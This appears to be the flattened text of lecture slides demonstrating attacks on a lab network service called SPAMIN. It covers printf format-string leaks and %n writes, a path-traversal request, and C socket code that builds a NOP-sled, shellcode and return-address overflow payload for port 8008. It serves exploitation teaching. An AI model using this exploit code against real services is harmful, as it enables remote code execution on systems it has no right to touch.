SPAMIN Binary Hacking

Tools IDA + Hex Rays hexeditor WinSCP Putty telnet Visual Studio Wireshark (Optional)

Do not pirate rays.com/idapro/hallofshame.html

Begin Demo SSH into and browse service netstat –anp telnet observe attempt exploit – optional reverse engineer exploit more patch

printf format string attack int printf(const char *format,...); printf(“%s”, str1); printf(“%s, %x, %x, %x”, str1, x, y, z); 3 “%x %x %x” 1 2 printf(“%x %x %x”,1,2,3); gets(str1); printf(str1); %n The number of characters written so far is stored into the integer indicated by the int * (or variant) pointer argument. No argument is converted

C# TcpClient client = new TcpClient(" ", 8008); StreamWriter streamWriter = new StreamWriter(client.GetStream()); streamWriter.Write("SPAM-IN-SPAM-OUT\n"); streamWriter.Write("../public_html/fun.php \n"); streamWriter.Write(" \n"); streamWriter.Flush();

format file contents filename x2000x200 0x2000x200 0x2000x200 0x62C0x62C 0xbffff178 … 0xbfffffff stuff

Gets Shell Code secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c secure.com/endymion/shellcodes/archive/linux -x86-mkdir1.c NOP Shell Code RA bufferbuffer

#include int sock; /* Socket descriptor */ struct sockaddr_in mySockAddr; /* server address */ WSADATA wsaData; /* Structure for WinSock setup communication */ if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */ { fprintf(stderr, "WSAStartup() failed"); exit(1); } sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&mySockAddr, 0, sizeof(mySockAddr)); mySockAddr.sin_family = AF_INET; mySockAddr.sin_addr.s_addr = inet_addr(" "); mySockAddr.sin_port = htons(8008); connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr)); send(sock,pass,17,0);

C# != C

unsigned __int8 isStringLess; // unsigned __int8 isStringEqual; // signed int v4; // int spamString2; // char *userInput1; // int result; // char v8; // [sp-10h] char v9; // [sp+0h] char *v10; // [sp+Ch] int v11; // [sp+10h] int spamString1; // [sp+14h] char *v13; // [sp+18h] __int16 v14; // [sp+1Ch] char format; // [sp+28h] char filedata; // [sp+228h] char filename; // [sp+428h] int v18; // [sp+628h] FILE *stream; // [sp+62Ch] format file contents filename Other Local Function Variable x2000x200 0x2000x200 0x2000x200 0x62C0x62C Save Register (Prologue) ebp RA 3 Save Register (Prologue) ebp Save Registers 0xbffffb … 0xbfffffff printf parameters RA process messageprocess message mainmain nop shellcode RA (repeated) printfprintf “%x %x %x” 1 2 printf(“%x %x %x”,1,2,3);

C# attack fork -- remote gdbserver gdb./spamin PID x /1000w 0xbfffffff – use offset found in printf attack gdbserver demo

int sock; /* Socket descriptor */ struct sockaddr_in mySockAddr; /* Echo server address */ char *pass = "SPAM-IN-SPAM-OUT\n"; char payload [2500]; WSADATA wsaData; /* Structure for WinSock setup communication */ if (WSAStartup(MAKEWORD(2, 0), &wsaData) != 0) /* Load Winsock 2.0 DLL */ { fprintf(stderr, "WSAStartup() failed"); exit(1); } sock = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP); memset(&mySockAddr, 0, sizeof(mySockAddr)); mySockAddr.sin_family = AF_INET; mySockAddr.sin_addr.s_addr = inet_addr(" "); mySockAddr.sin_port = htons(8008); connect(sock, (struct sockaddr *) &mySockAddr, sizeof(mySockAddr)); int nopLength = 300; int length = 700; memset(payload, '\x90', nopLength); // Create the nop sled in the payload memcpy(&payload[nopLength],sc,sizeof(sc)); // Copy the shellcode into payload for (int j=0; j < 1500; j+= 4) // Copy the RA into the payload { int r = nopLength + sizeof(sc) -1; memcpy(&payload[r+j], "\x20\xfb\xff\xbf", 4); } payload[length-1] = '\n'; send(sock,pass,17,0); send(sock, payload, length, 0); send(sock,pass,17,0);